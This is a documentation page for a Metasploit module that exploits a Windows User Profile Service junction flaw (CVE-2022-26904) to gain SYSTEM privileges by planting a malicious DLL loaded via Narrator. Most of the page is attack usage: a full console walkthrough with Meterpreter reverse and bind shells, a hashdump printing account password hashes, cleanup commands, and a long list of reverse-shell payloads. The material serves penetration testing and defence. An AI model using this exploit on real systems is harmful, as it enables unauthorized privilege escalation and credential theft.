User Profile Arbitrary Junction Creation Local Privilege Elevation - Metasploit
This page contains detailed information about how to use the exploit/windows/local/cve_2022_26904_superprofile metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: User Profile Arbitrary Junction Creation Local Privilege Elevation
Module: exploit/windows/local/cve_2022_26904_superprofile
Source code: modules/exploits/windows/local/cve_2022_26904_superprofile.rb
Disclosure date: 2022-03-17
Last modification time: 2022-04-07 10:48:08 +0000
Supported architecture(s): x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-34484, CVE-2022-21919, CVE-2022-26904
The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904. It is important to note that the credentials supplied for the second user to log in as in this exploit must be those of a normal non-admin user and these credentials must also corralate with a user who has already logged in at least once before. Additionally the current user running the exploit must have UAC set to the highest level, aka "Always Notify Me When", in order for the code to be executed as NT AUTHORITY\SYSTEM. Note however that "Always Notify Me When" is the default UAC setting on common Windows installs, so this would only affect instances where this setting has been changed either manually or as part of the installation process.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- screen-effects: Module may show something on the screen (Example: a window pops up).
- audio-effects: Module may cause a noise (Examples: audio output from the speakers or hardware beeps).
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/windows/local/cve_2022_26904_superprofile
msf exploit(cve_2022_26904_superprofile) > show targets
... a list of targets ...
msf exploit(cve_2022_26904_superprofile) > set TARGET target-id
msf exploit(cve_2022_26904_superprofile) > show options
... show and set options ...
msf exploit(cve_2022_26904_superprofile) > set SESSION session-id
msf exploit(cve_2022_26904_superprofile) > exploit
Required Options
SESSION: The session to run this module on
LOGINUSER: Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!
LOGINPASSWORD: Password for the secondary normal privileged user to log in as
Knowledge Base
Vulnerable Application
The User Profile Service on Windows 7 and later is affected by a lack of appropriate validation
when running the profext.dll
's CreateDirectoryJunction()
function. Previous iterations of this
vulnerability go by the CVE IDs CVE-2022-21919 and CVE-2021-34484, however this is a patch bypass for
both of these CVEs.
By abusing a combination of directory junction and symbolic links, an authenticated local attacker can manipulate the user profile service to create a junction in an arbitrary location as the SYSTEM user.
This exploit takes advantage of this to plant a malicious comctl32.dll
DLL in a system folder
that Narrator.exe
relies on. After this is complete, it will then trigger a UAC prompt to
cause narrator.exe
to load and run the malicious DLL as the NT AUTHORITY\SYSTEM
user.
Note that exploiting this vulnerability requires having the credentials of a secondary user
who has permissions to log into the local system and who is not an administrative user. The user
must also have a profile under C:\Users\<username>
or C:\Users\<username>.<domain>
prior to
running this exploit, in order for the exploit to succeed. In our tests, this typically meant that
the user must have logged in to the target computer in the past. However the target user can be
a local account or a domain joined account, either one will work for the purpose of exploitation so
long as the above criteria is met.
In addition to the above criteria, the user who is running the exploit process, aka the current user,
must have the PromptOnSecureDesktop
setting set to 1
. This is enabled by default and is highly unlikely
to be changed unless the UAC settings have been lowered from their defaults, however without this set,
the UAC prompt will be run as the current user and will not be run as SYSTEM
from the secure desktop,
which is a necessary step for this exploit to achieve SYSTEM
level code execution.
Note that Metasploit payloads are highly recommended to be used when exploiting this vulnerability due to the fact that it allows one to do automatic cleanup, thus minimizing detection. The exploit is quite noisy both sound wise due to Narrator reading aloud the user's screen, and visually as Narrator tries to highlight the various words on the screen, however after about 3 minute this should all go away once we get a shell and the Meterpreter cleanup code kicks in to kill these processes.
This module has been successfully tested on Windows 11.
Verification Steps
- Get a local session as a normal non-admin user on a fully updated Windows 11 install.
- Start
msfconsole
use exploit/windows/local/cve_2022_26904_superprofile.rb
set SESSION <session ID of local session from earlier>
set LOGINUSER <username of other non-admin user to use for exploit. Cannot be same as current user>
set LOGINDOMAIN <domain of the user specified by LOGINUSER>
set LOGINPASSWORD <password for the user specified by LOGINUSER>
- Set the payload type. Meterpreter is highly recommended for best results.
- Set the payload options.
exploit
- Verify that you get a new session as
NT AUTHORITY\SYSTEM
Options
LOGINUSER
The username of a valid user who has logged into the target system before and has a profile under C:\Users
with their username in
C:\Users\<username>.<domain>\
format if targetting a domain user or C:\Users\<username>\
if targetting a local user account. This user
must not be an administrator or any account that would run with High integrity to ensure the UAC prompt appears as expected, and should ideally
be another normal user account that has permissions to log into the target computer.
LOGINPASSWORD
The password for the LOGINUSER user.
LOGINDOMAIN
The domain that the LOGINUSER belongs to and which we will log into.
Scenarios
Windows 11 Build 10.0.22000.556
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 172.19.78.176
RHOST => 172.19.78.176
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 172.19.78.176:4444
[*] Sending stage (200262 bytes) to 172.19.78.176
[*] Meterpreter session 1 opened (172.19.70.15:38009 -> 172.19.78.176:4444 ) at 2022-03-28 17:17:13 -0500
meterpreter > getuid
Server username: WIN11-TEST\normal
meterpreter > sysinfo
Computer : WIN11-TEST
OS : Windows 10 (10.0 Build 22000).
Architecture : x64
System Language : en_US
Domain : TESTINGDOMAIN
Logged On Users : 10
Meterpreter : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2022_26904_superprofile
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_26904_superprofile) > show options
Module options (exploit/windows/local/cve_2022_26904_superprofile):
Name Current Setting Required Description
---- --------------- -------- -----------
LOGINDOMAIN . yes Domain that the LOGINUSER belongs to. Ensures we log into the right domain.
LOGINPASSWORD yes Password for the secondary normal privileged user to log in as
LOGINUSER yes Username of the secondary normal privileged user to log in as. Cannot be the same a
s the current user!
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 11
msf6 exploit(windows/local/cve_2022_26904_superprofile) > set LOGINDOMAIN TESTINGDOMAIN
LOGINDOMAIN => TESTINGDOMAIN
msf6 exploit(windows/local/cve_2022_26904_superprofile) > set LOGINUSER normal
LOGINUSER => normal
msf6 exploit(windows/local/cve_2022_26904_superprofile) > set LOGINPASSWORD normal1
LOGINPASSWORD => normal1
msf6 exploit(windows/local/cve_2022_26904_superprofile) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2022_26904_superprofile) > set LHOST 172.1
set LHOST 172.17.0.1 set LHOST 172.18.0.1 set LHOST 172.19.70.15
msf6 exploit(windows/local/cve_2022_26904_superprofile) > set LHOST 172.19.70.15
LHOST => 172.19.70.15
msf6 exploit(windows/local/cve_2022_26904_superprofile) > show options
Module options (exploit/windows/local/cve_2022_26904_superprofile):
Name Current Setting Required Description
---- --------------- -------- -----------
LOGINDOMAIN TESTINGDOMAIN yes Domain that the LOGINUSER belongs to. Ensures we log into the right domain.
LOGINPASSWORD normal1 yes Password for the secondary normal privileged user to log in as
LOGINUSER normal yes Username of the secondary normal privileged user to log in as. Cannot be the same a
s the current user!
SESSION 1 yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.19.70.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 11
msf6 exploit(windows/local/cve_2022_26904_superprofile) > check
[*] Checking if PromptOnSecureDesktop mitigation applied...
[+] PromptOnSecureDesktop is set to 1, should be safe to proceed!
[*] The target appears to be vulnerable. Vulnerable Windows 11 build detected!
msf6 exploit(windows/local/cve_2022_26904_superprofile) > exploit
[*] Started reverse TCP handler on 172.19.70.15:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if PromptOnSecureDesktop mitigation applied...
[+] PromptOnSecureDesktop is set to 1, should be safe to proceed!
[+] The target appears to be vulnerable. Vulnerable Windows 11 build detected!
[*] Step #1: Checking target environment...
[*] Payload DLL is 8704 bytes long
[*] Writing malicious DLL to C:\Users\normal\AppData\Local\Temp\UXjPXpYr.dll
[*] Marking DLL as full access for Everyone so that there are no access issues as the secondary user...
[*] Step #3: Loading the exploit DLL to run the main exploit...
[*] Launching netsh to host the DLL...
[+] Process 7144 launched.
[*] Reflectively injecting the DLL into 7144...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[!] Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:
[!] taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || rmdir /q /s C:\Users\TEMP || rmdir /q /s C:\Windows\System32\Narrator.exe.local
[!] You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!
[*] Sending stage (200262 bytes) to 172.19.78.176
[*] Meterpreter session 2 opened (172.19.70.15:4444 -> 172.19.78.176:49795 ) at 2022-03-28 17:19:15 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/local/cve_2022_26904_superprofile) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows WIN11-TEST\normal @ WIN11-TEST 172.19.70.15:38009 -> 172.19.78.176:4444 (172.19.78.176)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN11-TEST 172.19.70.15:4444 -> 172.19.78.176:49795 (172.19.78.176)
meterpreter > hashdump
admin:1001:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
normal:1002:aad3b435b51404eeaad3b435b51404ee:a38673ad58b19421e952fc317b62c3c4:::
normal2:1003:aad3b435b51404eeaad3b435b51404ee:ccc4aa1760d894d251095afc974ee2e3:::
normal3:1004:aad3b435b51404eeaad3b435b51404ee:c4799ce6104040284f457f69cde46c03:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:639f60910cff1cf4ba5a83f309bccf66:::
meterpreter >
Go back to menu.
Msfconsole Usage
Here is how the windows/local/cve_2022_26904_superprofile exploit module looks in the msfconsole:
msf6 > use exploit/windows/local/cve_2022_26904_superprofile
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_26904_superprofile) > show info
Name: User Profile Arbitrary Junction Creation Local Privilege Elevation
Module: exploit/windows/local/cve_2022_26904_superprofile
Platform: Windows
Arch: x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2022-03-17
Provided by:
KLINIX5
Grant Willcox
Module side effects:
artifacts-on-disk
ioc-in-logs
screen-effects
audio-effects
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Windows 11
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LOGINDOMAIN . yes Domain that the LOGINUSER belongs to. Ensures we log into the right domain.
LOGINPASSWORD yes Password for the secondary normal privileged user to log in as
LOGINUSER yes Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!
SESSION yes The session to run this module on
Payload information:
Description:
The user profile service, identified as ProfSrv, is vulnerable to a
local privilege elevation vulnerability in its
CreateDirectoryJunction() function due to a lack of appropriate
checks on the directory structure of the junctions it tries to link
together. Attackers can leverage this vulnerability to plant a
malicious DLL in a system directory and then trigger a UAC prompt to
cause this DLL to be loaded and executed by ProfSrv as the NT
AUTHORITY\SYSTEM user. Note that this bug was originally identified
as CVE-2021-34484 and was subsequently patched a second time as
CVE-2022-21919, however both patches were found to be insufficient.
This bug is a patch bypass for CVE-2022-21919 and at the time of
publishing, has not yet been patched, though plans are in place to
patch it as CVE-2022-26904. It is important to note that the
credentials supplied for the second user to log in as in this
exploit must be those of a normal non-admin user and these
credentials must also corralate with a user who has already logged
in at least once before. Additionally the current user running the
exploit must have UAC set to the highest level, aka "Always Notify
Me When", in order for the code to be executed as NT
AUTHORITY\SYSTEM. Note however that "Always Notify Me When" is the
default UAC setting on common Windows installs, so this would only
affect instances where this setting has been changed either manually
or as part of the installation process.
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-26904
https://github.com/rmusser01/SuperProfile
https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html
https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx
Module Options
This is a complete list of options available in the windows/local/cve_2022_26904_superprofile exploit:
msf6 exploit(windows/local/cve_2022_26904_superprofile) > show options
Module options (exploit/windows/local/cve_2022_26904_superprofile):
Name Current Setting Required Description
---- --------------- -------- -----------
LOGINDOMAIN . yes Domain that the LOGINUSER belongs to. Ensures we log into the right domain.
LOGINPASSWORD yes Password for the secondary normal privileged user to log in as
LOGINUSER yes Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 11
Advanced Options
Here is a complete list of advanced options supported by the windows/local/cve_2022_26904_superprofile exploit:
msf6 exploit(windows/local/cve_2022_26904_superprofile) > show advanced
Module advanced options (exploit/windows/local/cve_2022_26904_superprofile):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowNoCleanup false no Allow exploitation without the possibility of cleaning up files
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
ForceExploit false no Override check result
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 300 no Additional delay in seconds to wait for a session
Payload advanced options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-fram
ework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but
directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/local/cve_2022_26904_superprofile module can exploit:
msf6 exploit(windows/local/cve_2022_26904_superprofile) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 11
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/local/cve_2022_26904_superprofile exploit:
msf6 exploit(windows/local/cve_2022_26904_superprofile) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/generic/ssh/interact normal No Interact with Established SSH Connection
4 payload/windows/x64/exec normal No Windows x64 Execute Command
5 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
6 payload/windows/x64/messagebox normal No Windows MessageBox x64
7 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
8 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
9 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
10 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
11 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
12 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
13 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
14 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
15 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
16 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
17 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
18 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
19 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
20 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
21 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
22 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
23 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
24 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
25 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
26 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
27 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
28 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
29 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
30 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
31 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
32 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
33 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
34 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
35 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
36 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
37 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
38 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
39 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
40 payload/windows/x64/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
41 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
42 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
43 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
44 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
45 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
46 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
47 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
48 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
49 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
50 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
51 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
52 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
53 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
54 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
55 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
56 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
57 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
58 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
59 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
60 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
61 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
62 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
63 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
64 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Evasion Options
Here is the full list of possible evasion options supported by the windows/local/cve_2022_26904_superprofile exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/local/cve_2022_26904_superprofile) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Target is not a Windows system, so it is not affected by this vulnerability!
- Target is not running a vulnerable version of Windows!
- Was not able to retrieve the PromptOnSecureDesktop value. Error was <E>
- PromptOnSecureDesktop is set to 0, mitigation applied!
- PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?
- Could not retrieve the major n minor version of the target's build number!
- Vulnerable Windows 11 build detected!
- Vulnerable Windows 11 build detected!
- Vulnerable Windows 10 21H2 build detected!
- Vulnerable Windows 10 21H1 build detected!
- Vulnerable Windows 10 20H2 build detected!
- Vulnerable Windows 10 v2004 build detected!
- Vulnerable Windows 10 v1909 build detected!
- Vulnerable Windows 10 v1903 build detected!
- Vulnerable Windows 10 v1809 build detected!
- Vulnerable Windows 10 v1803 build detected!
- Vulnerable Windows 10 v1709 build detected!
- Vulnerable Windows 10 v1703 build detected!
- Vulnerable Windows 10 v1607 build detected!
- Vulnerable Windows 10 v1511 build detected!
- Vulnerable Windows 10 v1507 build detected!
- Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
- Vulnerable Windows 8/Windows Server 2012 build detected!
- Vulnerable Windows 7/Windows Server 2008 R2 build detected!
- Vulnerable Windows 7/Windows Server 2008 R2 build detected!
- Windows Server 2008/Windows Server 2008 SP2 build detected!
- The build number of the target machine does not appear to be a vulnerable version!
- This target is not presently supported by this exploit. Support may be added in the future!
- Attempts to exploit this target with this module WILL NOT WORK!
- Target is not running Windows!
- Target is running Windows, its not a version this module supports! Bailing...
- Session is already elevated
- Marking DLL as full access for Everyone so that there are no access issues as the secondary user...
- Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion
- taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || taskkill /IM "msiexec.exe" || rmdir /q /s C:UsersTEMP || rmdir /q /s C:WindowsSystem32Narrator.exe.local
- You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!
- Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Target is not a Windows system, so it is not affected by this vulnerability!
Here is a relevant code snippet related to the "Target is not a Windows system, so it is not affected by this vulnerability!" error message:
85: def check
86: sysinfo_value = sysinfo['OS']
87:
88: if sysinfo_value !~ /windows/i
